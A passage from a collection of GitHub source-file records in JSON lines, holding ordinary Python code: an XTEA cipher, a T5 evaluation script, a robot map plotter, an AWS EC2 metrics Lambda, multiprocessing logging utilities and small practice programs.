delta\n        v0.value -= (((v1.value << 4) ^ (v1.value >> 5)) +\n                     v1.value) ^ (v_sum.value+k[v_sum.value & 3])\n\n    return v0.value, v1.value\n\n\ndef test():\n    raw_data = [1, 2]\n    k = [2, 2, 3, 4]\n    data = encrypt(raw_data, k)\n    
de_data = decrypt(data, k)\n print(f'raw_data:{raw_data}')\n print(f'key:{k}')\n print(f'data:{data}')\n print(f'de_data:{de_data}')\n\n","repo_name":"serfend/QQTea","sub_path":"src/QQTEA/xtea.py","file_name":"xtea.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105388160","text":"import os\n\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\n\nBASE_PATH = os.getenv(\"PYTHONPATH\", \"/home/sachdeva/projects/exp_calibration/\")\n\nif __name__ == \"__main__\":\n model_path = BASE_PATH + \"t5-base-nq-short-qg-10ep/checkpoint-109150\"\n tokenizer = AutoTokenizer.from_pretrained(\"t5-base\")\n model = AutoModelForSeq2SeqLM.from_pretrained(model_path)\n model.eval()\n hl_token = \"\"\n context = f\"The Super bowl was held at the Levi's Stadium in the {hl_token} New York {hl_token}.\"\n prepared_input = f\"generate question: {context}\"\n features = tokenizer(\n prepared_input,\n max_length=128,\n padding=\"max_length\",\n truncation=True,\n return_tensors=\"pt\",\n )\n # print(features)\n outputs = model.generate(**features, max_length=128, num_beams=2)\n dec_preds = tokenizer.decode(outputs[0], skip_special_tokens=True)\n print(\"The prediction is: \", dec_preds)\n","repo_name":"UKPLab/CATfOOD","sub_path":"src/cf_generation/baseline_generation/evaluation/eval_qg.py","file_name":"eval_qg.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23789749857","text":"import matplotlib\r\nimport matplotlib.pyplot as plt\r\nplt.ion()\r\nimport numpy as np\r\nimport time\r\n\r\nclass Obj:\r\n def __init__(self,ID, pos, length, depth):\r\n self.ID = ID\r\n self.pos = pos\r\n self.length = length\r\n self.depth = depth \r\n\r\nclass Map:\r\n def __init__(self, Lx, Ly):\r\n self.Lx = Lx\r\n self.Ly = Ly\r\n self.obj = []\r\n self.fig = None \r\n \r\n def draw(self,objs = {}):\r\n car_length = 400\r\n car_width = 300\r\n if len(objs) == 0:\r\n plt.cla()\r\n plt.xlim(self.Lx)\r\n plt.ylim(self.Ly)\r\n return False\r\n if self.fig is None:\r\n #self.fig, ax = plt.subplots(figsize = (9,6))\r\n #print(\"sdfgsdfgds\")\r\n self.fig = plt.figure(figsize = (5, 5*(self.Ly[1]-self.Ly[0])/(self.Lx[1]-self.Lx[0]))) \r\n \r\n #plt.show(block=False)\r\n #plt.close()\r\n else:\r\n plt.cla()\r\n for k, obj in objs.items():\r\n #print(obj.ID, obj.pos, obj.length, obj.depth)\r\n #plt.plot(obj.pos[0],obj.pos[1], 'ro')\r\n if obj.ID == 11: # robot position\r\n rec_corner = [obj.pos[0]+30*np.cos(obj.pos[2]+np.pi)+(car_width/2)*np.cos(obj.pos[2]-np.pi/2),\r\n obj.pos[1]+30*np.sin(obj.pos[2]+np.pi)+(car_width/2)*np.sin(obj.pos[2]-np.pi/2)]\r\n plt.gca().add_patch(plt.Rectangle(rec_corner, car_length, car_width, np.degrees(obj.pos[2]), facecolor='w', edgecolor='b'))\r\n plt.arrow(obj.pos[0], obj.pos[1], np.cos(obj.pos[2]), np.sin(obj.pos[2]), color='r', width=30)\r\n elif obj.ID < 11: # Obstacles\r\n rec_corner = [obj.pos[0]+obj.length/2*np.cos(obj.pos[2]+np.pi)+(obj.depth/2)*np.cos(obj.pos[2]-np.pi/2),\r\n obj.pos[1]+obj.length/2*np.sin(obj.pos[2]+np.pi)+(obj.depth/2)*np.sin(obj.pos[2]-np.pi/2)]\r\n plt.gca().add_patch(plt.Rectangle(rec_corner, obj.length, obj.depth, np.degrees(obj.pos[2]), color = 'k'))\r\n plt.arrow(obj.pos[0], obj.pos[1], np.cos(obj.pos[2]), np.sin(obj.pos[2]), color='r', width=30)\r\n else: # Destination\r\n rec_corner = 
[obj.pos[0]+obj.length/2*np.cos(obj.pos[2]+np.pi)+(obj.depth/2)*np.cos(obj.pos[2]-np.pi/2),\r\n obj.pos[1]+obj.length/2*np.sin(obj.pos[2]+np.pi)+(obj.depth/2)*np.sin(obj.pos[2]-np.pi/2)]\r\n plt.gca().add_patch(plt.Rectangle(rec_corner, obj.length, obj.depth, np.degrees(obj.pos[2]), color = 'b'))\r\n plt.arrow(obj.pos[0], obj.pos[1], np.cos(obj.pos[2]), np.sin(obj.pos[2]), color='r', width=30)\r\n \r\n plt.xlim(self.Lx)\r\n plt.ylim(self.Ly)\r\n self.fig.canvas.flush_events()\r\n #self.fig.canvas.draw()\r\n \r\n\r\ndef goalFromShelf(shelf, dis):\r\n rec_corner = [shelf.pos[0]+dis*np.cos(shelf.pos[2]+np.pi)-(shelf.depth/2 + 200)*np.cos(shelf.pos[2]-np.pi/2),\r\n shelf.pos[1]+dis*np.sin(shelf.pos[2]+np.pi)-(shelf.depth/2 + 200)*np.sin(shelf.pos[2]-np.pi/2)] \r\n return [rec_corner[0],rec_corner[1],shelf.pos[2]]\r\n\r\n#s1 = Obj(11,[100,100,np.pi/2],300,300)\r\n#s2 = Obj(1,[0,0,np.pi],1000,300)\r\n#s3 = Obj(11,goalFromShelf(s2,s2.length),300,300)\r\n#o = {}\r\n#m = Map([-1500,1500],[-1000,1000])\r\n#o[s1.ID] = s1\r\n#m.draw(o)\r\n#time.sleep(1)\r\n#o[s2.ID] = s2\r\n#m.draw(o)\r\n#time.sleep(1)\r\n#o[s3.ID] = s3\r\n#m.draw(o)\r\n#import math\r\n#curPos = [-1699,-254,1.11]\r\n#desPos = [-682.43,612,-3.11]\r\n#direction = math.atan2(desPos[1] - curPos[1], desPos[0] - curPos[0])\r\n\r\n\r\n","repo_name":"domlocnguyen/Librarian-robot","sub_path":"Map.py","file_name":"Map.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16059112184","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : maximum-depth-of-binary-tree.py\n@Time : 2022/4/7\n@Author: Tk \n@Software: PyCharm\n\n输入:\n3,9,20,None,None,15,7\n输出:\n3\n\n\"\"\"\nfrom main import list_to_binarytree\n\nnums = input().split(\",\") \n\nbinary_tree = list_to_binarytree(nums)\n\n\nclass Solution:\n def maxDepth(self, root) -> int:\n if root is None:\n return 0\n l = self.maxDepth(root.left)\n r = self.maxDepth(root.right)\n return 1 + max(l, r)\n\n\ns = Solution()\nresult = s.maxDepth(binary_tree)\nprint(result)\n\n\n\n\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"二叉树-8-二刷/maximum-depth-of-binary-tree.py","file_name":"maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22801521773","text":"import boto3\nimport json\n\n\ndef lambda_handler(event, context):\n app = MetricEC2()\n app.main()\n\n\nclass MetricEC2(object):\n def __init__(self):\n self.cloudwatch_client = boto3.client('cloudwatch')\n self.ec2_client = boto3.client('ec2')\n self.metric_data_template = 'metric/metric_template.txt'\n self.metric_count_template = 'metric/metric_put_count.txt'\n self.metric_data = []\n\n def set_metric_data(self, file_path, metricname, dimension_value, value_value):\n metric_data = self.read_file(file_path)\n metric_data['MetricName'] = metricname\n metric_data['Dimensions'][0]['Value'] = dimension_value\n metric_data['Value'] = value_value\n self.metric_data.append(metric_data)\n\n def cloudwatch_metric_data_put(self, metric_data_info):\n self.cloudwatch_client.put_metric_data(\n Namespace=metric_data_info['Namespace'],\n MetricData=metric_data_info['MetricData']\n )\n\n def ec2_instances_describe(self):\n response = self.ec2_client.describe_instances(\n )\n return response['Reservations']\n\n def ec2_instance_describe(self, instanceid):\n response = self.ec2_client.describe_instances(\n InstanceIds=[\n 
instanceid,\n ],\n )\n return response['Reservations']\n\n @staticmethod\n def read_file(path):\n f = open(path, 'r')\n data = f.read()\n f.close()\n data = json.loads(data)\n return data\n\n def main(self):\n metric_data_put = self.read_file(self.metric_data_template)\n metric_data_put['Namespace'] = 'EC2'\n ec2_instances_info = self.ec2_instances_describe()\n ec2_instances_other = ['i-03e49820693fec5dc', 'i-0a21499fb0912a33e']\n for instanceid in ec2_instances_other:\n try:\n instance_info = self.ec2_instance_describe(instanceid)\n ec2_instances_info = ec2_instances_info+instance_info\n except Exception as e:\n print(e.__str__())\n ec2_instance_count = len(ec2_instances_info)\n ec2_instance_running_count = 0\n ec2_instance_stopped_count = 0\n\n for ec2_instance_info in ec2_instances_info:\n status = ec2_instance_info['Instances'][0]['State']['Name']\n if status == \"running\":\n ec2_instance_running_count += 1\n elif status == \"stopped\":\n ec2_instance_stopped_count += 1\n self.set_metric_data(self.metric_count_template, 'EC2InstanceCount', 'EC2Instance', ec2_instance_count)\n self.set_metric_data(self.metric_count_template, 'EC2InstanceRunningCount', 'EC2InstanceRunning', ec2_instance_running_count)\n self.set_metric_data(self.metric_count_template, 'EC2InstanceStoppedCount', 'EC2InstanceStopped', ec2_instance_stopped_count)\n for metric_data in self.metric_data:\n metric_data_put['MetricData'] = [metric_data]\n self.cloudwatch_metric_data_put(metric_data_put)\n\n\n# if __name__ == '__main__':\n# app = MetricEC2()\n# app.main()\n","repo_name":"isjin/aws-python3-boto3","sub_path":"lamdba/cloudwatch_metric_put/cloudwatch_metrics_put_ec2.py","file_name":"cloudwatch_metrics_put_ec2.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21917421080","text":"lijst = ['Jonas', 'Jana', 'Leo', 'Henry', 'Michael']\nprint(lijst)\nprint()\nletter = input('Enter the letter you want to remove. Press Enter if you want to stop: ')\nwhile letter != '':\n lijst_2 = []\n for x in range(5):\n word = ''\n for i in lijst[x]:\n if i != letter:\n word = word + i\n lijst_2.append(word)\n lijst = lijst_2\n print(lijst)\n letter = input('Enter the letter you want to remove. 
Press Enter if you want to stop: ')","repo_name":"jnoas123/python","sub_path":"examen_nobember/remove_letters.py","file_name":"remove_letters.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72721337974","text":"import logging\nfrom multiprocessing import current_process, managers, pool, Process\nfrom subprocess import Popen\nimport threading\nimport queue\nimport sys\nimport os\nfrom collections import defaultdict\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\nclass AcquirerProxy(managers.AcquirerProxy):\n    _exposed_ = ('acquire', 'release', '__enter__', '__exit__')\n\n\nif 'redis' in sys.modules:\n    import redis\n    class RedisStorage(redis.Redis):\n        access = 'client'\n        getLock = redis.Redis.lock\n        getRLock = redis.Redis.lock\n\n        def start(self):\n            return self\n        connect = start\n\n        # make proxies\n        # getValue =\n        # getList =\n        # getQueue =\n        # getJoinableQueue =\n        # getEvent =\n        # getSemaphore =\n        # getBoundedSemaphore =\n        # getCondition =\n        # getBarrier =\n        # getPool =\n        # getDict =\n        # getArray =\n        # getNamespace =\n\n\nclass MPStorage(managers.SyncManager):\n    def __init__(self, *args, **kwargs):\n        \"\"\"\n        :param(s): accepts same parameters as multiprocessing.managers.BaseManager\n        \"\"\"\n        super().__init__(*args, **kwargs)\n        self.access = None\n        self._storage = dict()\n\n        self.__class__.register(\n            'getQueue',\n            lambda k, *a, **kw: self._getitem(k, queue.Queue, *a, **kw)\n        )\n        self.__class__.register(\n            'getJoinableQueue',\n            lambda k, *a, **kw: self._getitem(k, queue.Queue, *a, **kw),\n        )\n        self.__class__.register(\n            'getEvent',\n            lambda k, *a, **kw: self._getitem(k, threading.Event, *a, **kw),\n            proxytype=managers.EventProxy\n        )\n        self.__class__.register(\n            'getLock',\n            lambda k, *a, **kw: self._getitem(k, threading.Lock, *a, **kw),\n            proxytype=AcquirerProxy\n        )\n        self.__class__.register(\n            'getRLock',\n            lambda k, *a, **kw: self._getitem(k, threading.RLock, *a, **kw),\n            proxytype=AcquirerProxy\n        )\n        self.__class__.register(\n            'getSemaphore',\n            lambda k, *a, **kw: self._getitem(k, threading.Semaphore, *a, **kw),\n            proxytype=AcquirerProxy\n        )\n        self.__class__.register(\n            'getBoundedSemaphore',\n            lambda k, *a, **kw: self._getitem(k, threading.BoundedSemaphore, *a, **kw),\n            proxytype=AcquirerProxy\n        )\n        self.__class__.register(\n            'getCondition',\n            lambda k, *a, **kw: self._getitem(k, threading.Condition, *a, **kw),\n            proxytype=managers.ConditionProxy\n        )\n        self.__class__.register(\n            'getBarrier',\n            lambda k, *a, **kw: self._getitem(k, threading.Barrier, *a, **kw),\n            proxytype=managers.BarrierProxy\n        )\n        self.__class__.register(\n            'getPool',\n            lambda k, *a, **kw: self._getitem(k, pool.Pool, *a, **kw),\n            proxytype=managers.PoolProxy\n        )\n        self.__class__.register(\n            'getList',\n            lambda k, *a, **kw: self._getitem(k, list, *a, **kw),\n            proxytype=managers.ListProxy\n        )\n        self.__class__.register(\n            'getDict',\n            lambda k, *a, **kw: self._getitem(k, dict, *a, **kw),\n            proxytype=managers.DictProxy\n        )\n        self.__class__.register(\n            'getValue',\n            lambda k, *a, **kw: self._getitem(k, managers.Value, *a, **kw),\n            proxytype=managers.ValueProxy\n        )\n        self.__class__.register(\n            'getArray',\n            lambda k, *a, **kw: self._getitem(k, managers.Array, *a, **kw),\n            proxytype=managers.ArrayProxy\n        )\n        self.__class__.register(\n            'getNamespace',\n            lambda k, *a, **kw: self._getitem(k, managers.Namespace, *a, **kw),\n            proxytype=managers.NamespaceProxy\n        )\n\n        self.logger = 
logging.getLogger(\n '.'.join([__name__, type(self).__name__]) + ':' + str(self.address)\n )\n self.logger.addHandler(logging.NullHandler())\n\n def _getitem(self, key, _type, *args, **kwargs):\n if _type not in self._storage.keys():\n self.logger.info(f\"Creating dict for type {_type.__name__}\")\n self._storage[_type] = dict()\n if key not in self._storage[_type].keys():\n self.logger.info(f\"Creating {_type.__name__} for key '{key}'\")\n item = _type(*args, **kwargs)\n self._storage[_type][key] = item\n return self._storage[_type][key]\n\n def start(self, *args, **kwargs):\n back = sys.stderr\n try:\n self.logger.info(\"Server starting...\")\n sys.stderr = os.devnull\n super().start(*args, **kwargs)\n self.access = 'server'\n sys.stderr = back\n self.logger.info(\"Server started.\")\n except EOFError:\n self.logger.warning(\"Server already running.\")\n super().connect()\n self.access = 'client'\n sys.stderr = back\n finally:\n sys.stderr = back\n return self\n\n\n# TODO: pytest MPRunner\nclass MPRunner(object):\n \"\"\"\n # https://pymotw.com/2/multiprocessing/basics.html\n \"\"\"\n logger = logging.getLogger('.'.join([__name__, 'MPRunner']))\n logger.addHandler(logging.NullHandler())\n\n def __init__(self, procs=None):\n self.procs = defaultdict(list)\n self._allprocs = []\n self._active = []\n\n if procs is not None:\n self.register_multiple(procs)\n\n def register_multiple(self, procs):\n if isinstance(procs, dict):\n for k, v in procs.items():\n if v in [None, False, (), {}, []]:\n self.register(k)\n continue\n\n if isinstance(v, dict):\n self.register(k, kwargs=v)\n continue\n\n if isinstance(v, bool):\n self.register(k, daemon=v)\n continue\n\n v = list(v)\n daemon, args, kwargs = False, None, None\n for item in v:\n if isinstance(item, bool):\n daemon = item\n elif isinstance(item, dict):\n kwargs = item\n else:\n args = item\n self.logger.warning((\"register_multiple()\", k, daemon, args, kwargs))\n\n self.register(k, daemon, args, kwargs)\n elif isinstance(procs, (list, tuple)) or hasattr(procs, '__iter__') or hasattr(procs, '__next__'):\n for p in procs:\n self.register(p)\n elif callable(procs) or isinstance(procs, str):\n self.register(procs)\n else:\n raise ValueError(f\"Provide dict, not {type(procs)}\")\n\n def process_start_callback(self, proc):\n self.logger.info(f\"Starting {'daemon ' if proc.daemon else ''}'{proc}' at pid {proc.pid}\")\n\n def process_end_callback(self, proc):\n self.logger.info(f\"Finished process '{proc}' at pid {proc.pid}\")\n\n def register_process(self, process, daemon=None):\n if daemon is not None:\n process.daemon = daemon\n self.procs[process.name].append(process)\n self._allprocs.append(process)\n self.logger.info(f\"Registered process '{process.name}'\")\n return process\n\n def register_function(self, func, daemon=False, args=None, kwargs=None):\n name = getattr(func, '__name__', \"Function\")\n\n pr = self._make_process(name, func, daemon, args, kwargs)\n\n self.procs[pr.name].append(pr)\n self._allprocs.append(pr)\n self.logger.info(f\"Registered function '{pr.name}' {daemon} {args} {kwargs}\")\n return pr\n\n def register_command(self, cmds, daemon=False, args=None, kwargs=None):\n if not isinstance(cmds, str):\n cmds = [c for c in cmds]\n if not all(isinstance(c, str) for c in cmds):\n raise ValueError(f\"Commands must all be strings\")\n cmds = ' '.join(cmds)\n\n pr = self._make_process(cmds, Popen, daemon, args, kwargs)\n\n self.procs[cmds].append(pr)\n self._allprocs.append(pr)\n self.logger.info(f\"Registered command 
'{pr.name}'\")\n        return pr\n\n    def _make_process(self, name, func, daemon=False, args=None, kwargs=None):\n        args = () if args is None else args\n        kwargs = {} if kwargs is None else kwargs\n\n        if args and kwargs:\n            return Process(name=name, daemon=daemon, target=func, args=args, kwargs=kwargs)\n        elif args:\n            return Process(name=name, daemon=daemon, target=func, args=args)\n        elif kwargs:\n            return Process(name=name, daemon=daemon, target=func, kwargs=kwargs)\n        else:\n            return Process(name=name, daemon=daemon, target=func)\n\n    def register(self, process, daemon=False, args=None, kwargs=None):\n        if isinstance(process, Process):\n            # register the instance that was passed in, not the Process class itself\n            return self.register_process(process, daemon)\n        elif callable(process):\n            return self.register_function(process, daemon, args, kwargs)\n        elif isinstance(process, (str, list, tuple)) or hasattr(process, '__iter__') or hasattr(process, '__next__'):\n            return self.register_command(process, daemon, args, kwargs)\n        else:\n            raise NotImplementedError(f\"Cannot handle {process}\")\n\n    def runSerial(self):\n        self.logger.info(f\"Starting {sum(len(p) for p in self.procs.values())} processes.\")\n        for name, prs in self.procs.items():\n            for pr in prs:\n                self.process_start_callback(pr)\n                pr.run()\n                self.process_end_callback(pr)\n\n    def start(self):\n        self.logger.info(f\"Starting {sum(len(p) for p in self.procs.values())} processes.\")\n        for name, prs in self.procs.items():\n            for pr in prs:\n                self._active.append(pr)\n                pr.start()\n                self.process_start_callback(pr)\n\n    def shutdown(self, wait_for_daemons=True):\n        ps = list(self._allprocs)\n        ds = []\n\n        if wait_for_daemons is True:\n            for p in ps:\n                if p.daemon is True:\n                    ds.append(p)\n                    ps.remove(p)\n            self.logger.info(f\"Allowing {len(ds)} daemons to continue.\")\n\n        self.logger.info(f\"Terminating {len(ps)} processes.\")\n        for p in ps:\n            p.terminate()\n\n        self.monitor()\n        self.join()\n        self.monitor()\n        self.logger.info(f\"{type(self).__name__} has shutdown.\")\n\n    def join(self, timeout=None):\n        self.logger.debug(\"Joining processes\")\n        for p in self._allprocs:\n            p.join(timeout)\n            self.logger.debug(f\"joined {p}\")\n\n    def active_children(self):\n        return [p for p in self._allprocs if p.is_alive()]\n\n    def monitor(self):\n        active = self.active_children()\n        for was_running in self._active:\n            if was_running not in active:\n                self._active.remove(was_running)\n                self.process_end_callback(was_running)\n\n    def loop(self, ignore=None, ignore_daemons=True):\n        if ignore is None:\n            ignore = []\n        if ignore_daemons is True:\n            ignore.extend(p for p in self._allprocs if p.daemon is True)\n\n        self.monitor()\n\n        ps = list(self._active)\n        for i in ignore:\n            ps.remove(i)\n\n        return len(ps) > 0\n\n\nif 'redis' in sys.modules:\n    import redis\n    address = ('localhost', 6379)\n    lockserver = redis.Redis(host=address[0], port=address[1])\n    lockserver.ping()\n    _getlock = lockserver.lock\nelse:\n    address = ('localhost', 12345)\n    authkey = b'localhost:12345.__mp_log_handlers'\n    lockserver = MPStorage(address, authkey=authkey)\n    _getlock = lockserver.getRLock\n\n\ndef _get_stream_identifier(stream):\n    def get_name(stm):\n        if hasattr(stm, 'buffer'):\n            buffer = stm.buffer\n            if hasattr(buffer, 'raw'):\n                raw = buffer.raw\n                if hasattr(raw, 'name'):\n                    if isinstance(raw.name, str):\n                        return raw.name\n            if hasattr(buffer, 'name'):\n                if isinstance(buffer.name, (str, int)):\n                    return buffer.name\n        if hasattr(stm, 'name'):\n            if isinstance(stm.name, (str, int)):\n                return stm.name\n        return None\n\n    key = get_name(stream)\n    try: key = (current_process().pid, int(key))\n    except: 
pass\n\n    if isinstance(key, str):\n        key = os.path.abspath(key)\n\n    if key is None:\n        key = (current_process().pid, str(stream))\n\n    return str(key)\n\n\nclass MPStreamHandler(logging.StreamHandler):\n    def __init__(self, stream=None, formatter=None, **fmtkw):\n        if stream is None:\n            stream = sys.stderr\n        self.stream = stream\n        logging.Handler.__init__(self)\n        if formatter is None:\n            formatter = MultilineFormatter(**fmtkw)\n        self.setFormatter(formatter)\n\n    def lock_factory(self, identifier):\n        return _getlock(identifier)\n\n    def createLock(self):\n        if isinstance(lockserver, MPStorage):\n            if lockserver._state.value == managers.State.INITIAL:\n                lockserver.start()\n\n        key = '.'.join([__name__, type(self).__name__]) + ':' + _get_stream_identifier(self.stream)\n        self.lock_name = key\n        # self.logger.debug(f\"Made key '{key}' for {self.stream}\")\n        self.lock = self.lock_factory(key)\n\n    def flush(self):\n        if self.stream and hasattr(self.stream, \"flush\"):\n            self.stream.flush()\n\n    def emit(self, record):\n        try:\n            msg = self.format(record)\n            stream = self.stream\n            with self.lock:\n                stream.write(msg)\n                stream.write(self.terminator)\n                self.flush()\n        except Exception:\n            self.handleError(record)\n\n    def handle(self, record):\n        rv = self.filter(record)\n        if rv:\n            self.emit(record)\n        return rv\n\n\nclass MPFileHandler(MPStreamHandler):\n    def __init__(self, filename, mode='a', encoding=None, delay=False,\n                 formatter=None, **fmtkw):\n        filename = os.fspath(filename)\n\n        self.baseFilename = os.path.abspath(filename)\n        self.mode = mode\n        self.encoding = encoding\n        self.delay = delay\n        if formatter is None:\n            formatter = MultilineFormatter(**fmtkw)\n\n        if delay:\n            logging.Handler.__init__(self)\n            self.setFormatter(formatter)\n            self.stream = None\n        else:\n            MPStreamHandler.__init__(self, self._open(),\n                                     formatter=formatter)\n\n        filepath = os.path.dirname(self.baseFilename)\n        os.makedirs(filepath, exist_ok=True)\n\n    def _open(self):\n        if not os.path.exists(os.path.dirname(self.baseFilename)):\n            os.makedirs(os.path.dirname(self.baseFilename))\n        return open(self.baseFilename, self.mode, encoding=self.encoding)\n\n    def createLock(self):\n        if isinstance(lockserver, MPStorage):\n            if lockserver._state.value == managers.State.INITIAL:\n                lockserver.start()\n\n        key = '.'.join([__name__, type(self).__name__]) + ':' + self.baseFilename\n        self.lock_name = key\n        # self.logger.debug(f\"Made key '{key}' for {self.stream}\")\n        self.lock = self.lock_factory(key)\n\n    def emit(self, record):\n        try:\n            msg = self.format(record)\n            with self.lock:\n                if self.stream is None:\n                    self.stream = self._open()\n                stream = self.stream\n                stream.write(msg)\n                stream.write(self.terminator)\n                self.flush()\n        except Exception:\n            self.handleError(record)\n\n\nclass MultilineFormatter(logging.Formatter):\n    \"\"\"\n    Inspired by https://stackoverflow.com/a/45217732\n    \"\"\"\n    def format(self, record: logging.LogRecord):\n        save_msg = record.msg\n        if not isinstance(save_msg, str):\n            save_msg = str(save_msg)\n        output = \"\"\n        for line in save_msg.splitlines():\n            record.msg = line\n            output += super().format(record) + \"\\n\"\n        output = output[:-1]\n        record.msg = save_msg\n        record.message = output\n        return output\n\n\n__all__ = ['MPStreamHandler', 'MPFileHandler', 'MPStorage', 'MultilineFormatter', 'MPRunner']\nif 'redis' in sys.modules:\n    
__all__.append('RedisStorage')\n","repo_name":"timjolson/mp_utils","sub_path":"mp_utils.py","file_name":"mp_utils.py","file_ext":"py","file_size_in_byte":16675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5434050569","text":"from practice import sumitems, multitems, maxnum, minnum, listempty, remdups, listnlong, commonmem, rem045\r\n\r\n#items = [6, 8, 3, 2]\r\n#noitems = []\r\n#dups = [5, 4, 4, 3, 5, 6, 6, 6, 7, 7, 8, 99, 99]\r\n#words = [\"car\", \"bus\", \"me\", \"he\", \"she\", \"us\", \"tractor\"]\r\n\r\n\r\n#sumitems(items)\r\n#multitems(items)\r\n#maxnum(items)\r\n#minnum(items)\r\n#listempty(items)\r\n#listempty(noitems)\r\n#remdups(dups)\r\n#listnlong(words, 2)\r\n#commonmem([1, 2, 3, 4], [3, 4, 5])\r\n#rem045(remlist)\r\n\r\n\r\n#print(remlist)\r\n#redlist.pop(2)\r\nredlist = ['zeroth', 'first', 'second', 'third', 'fourth', 'fifth', 'sixth']\r\nprint(enumerate(redlist))\r\n\r\nstr = \"HelloWorld\"\r\nprint(list(enumerate(str)))","repo_name":"spyingcyclops/learnpythonthehardway","sub_path":"practice/practice_test.py","file_name":"practice_test.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30123413941","text":"episode = \"Titanic\"\n\noriginal_srt_file = episode + \".srt\"\nemotion_srt_file = episode + \"_Emotion.srt\"\nemotion_file = episode + \".emotion\"\n\nfr = open(original_srt_file, \"r\")\nfw = open(emotion_srt_file, \"w\")\n\nEMOTIONS = {}\ni = 1\n# Read emotion file\nf = open(emotion_file)\n\nfor line in f:\n\tline = line.strip()\n\tEMOTIONS[i] = line\n\ti += 1\n\nk = 0\ni = 1\n\nfor line in fr:\n\tif k > 1:\n\t\tif k == 2:\n\t\t\tfw.write(EMOTIONS[i])\n\t\t\tfw.write(\"\\n\")\n\telse:\n\t\tfw.write(line)\n\n\tk += 1\n\n\tif line.strip() == \"\":\n\t\tfw.write(\"\\n\")\n\t\tk = 0\n\t\ti += 1\t\n\n","repo_name":"tjdharamsi/NLP-Movie-EmotionMining","sub_path":"keerti_visual/clip_viz.py","file_name":"clip_viz.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29698235234","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport common\nimport templates\n\n\ndef manage():\n    \"\"\"\n    Management platform\n    :return: None\n    \"\"\"\n    school_name = input(\"Enter school name :\").strip()\n    school_obj = common.School(school_name)\n    while True:\n        print(templates.manage_menu)\n        choice = input(\">>>\").strip()\n        if choice == \"1\":\n            name = input(\"Enter teacher name: \").strip()\n            course = input(\"Enter course name: \").strip()\n            school_obj.hire_teacher(name, course)\n        elif choice == \"2\":\n            teacher = input(\"Enter teacher name: \").strip()\n            grade = input(\"Enter grade name: \").strip()\n            school_obj.create_grade(grade, teacher)\n        elif choice == \"3\":\n            print(\"\\tEnter the course name, period and price separated by '|', e.g. linux|7 months|7000\")\n            course,period,price = input(\">>\").strip().split(\"|\")\n            school_obj.create_course(course, period, price)\n            common.Course.cat_course(school_obj)\n        elif choice == \"4\":\n            break\n        else:\n            print(\"\\t\\033[0;31mPlease enter a valid option!\\033[0m\")\n            continue\n\n\ndef teacher():\n    \"\"\"\n    Teacher center\n    :return: None\n    \"\"\"\n    school_name = input(\"Enter school name: \").strip()\n    teacher_name = input(\"Enter teacher name: \").strip()\n    school_obj = common.School(school_name)\n    teacher_obj = common.Teacher(teacher_name, school_obj)\n\n    while True:\n        print(templates.teacher_menu)\n        choice = input(\">>\").strip()\n        if choice == \"1\":\n            grade = 
input(\"Enter grade number : \").strip()\n            teacher_obj.set_grade(grade)\n        elif choice == \"2\":\n            teacher_obj.cat_students()\n        elif choice == \"3\":\n            student_name = input(\"Enter student name :\").strip()\n            result = input(\"Enter student result : \").strip()\n            teacher_obj.set_result(student_name, result)\n        elif choice == \"4\":\n            break\n        else:\n            print(\"\\t\\033[0;31m%s Please enter a valid option!\\033[0m\" % teacher_obj.name)\n            continue\n\n\ndef student():\n    \"\"\"\n    Student center\n    :return: None\n    \"\"\"\n    school_name = input(\"Enter school name: \").strip()\n    student_name = input(\"Enter student name: \").strip()\n    school_obj = common.School(school_name)\n    student_obj = common.Student(student_name, school_obj)\n\n    while True:\n        print(templates.student_menu)\n        choice = input(\">>\").strip()\n        if choice == \"1\":\n            student_obj.enroll()\n        elif choice == \"2\":\n            money = input(\"Enter tuition : \").strip()\n            while not money.isdigit():\n                print(\"\\t\\033[0;31m%s Please enter a valid payment amount!\\033[0m\" % student_name)\n                money = input(\"Enter tuition : \").strip()\n            student_obj.pay_tuition(int(money))\n\n        elif choice == \"3\":\n            grade = input(\"Enter grade number : \").strip()\n            student_obj.set_grade(grade)\n        elif choice == \"4\":\n            break\n        else:\n            print(\"\\t\\033[0;31m%s Please enter a valid option!\\033[0m\" % student_obj.name)\n            continue\n\n\ndef main():\n    \"\"\"\n    Course selection system\n    :return: None\n    \"\"\"\n    while True:\n        print(templates.first_menu)\n        choice = input(\">>\").strip()\n        if choice == \"1\":\n            manage()\n        elif choice == \"2\":\n            teacher()\n        elif choice == \"3\":\n            student()\n        elif choice == \"4\":\n            break\n        else:\n            print(\"\\t\\033[0;31mPlease enter a valid option!\\033[0m\")\n            continue\n\n\nif __name__ == '__main__':\n    main()","repo_name":"liuxingrichu/course-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34202451847","text":"from os import path\n\n# This import isn't strictly necessary here, but it was added to make sure\n# we use a Qt version compatible with matplotlib. 
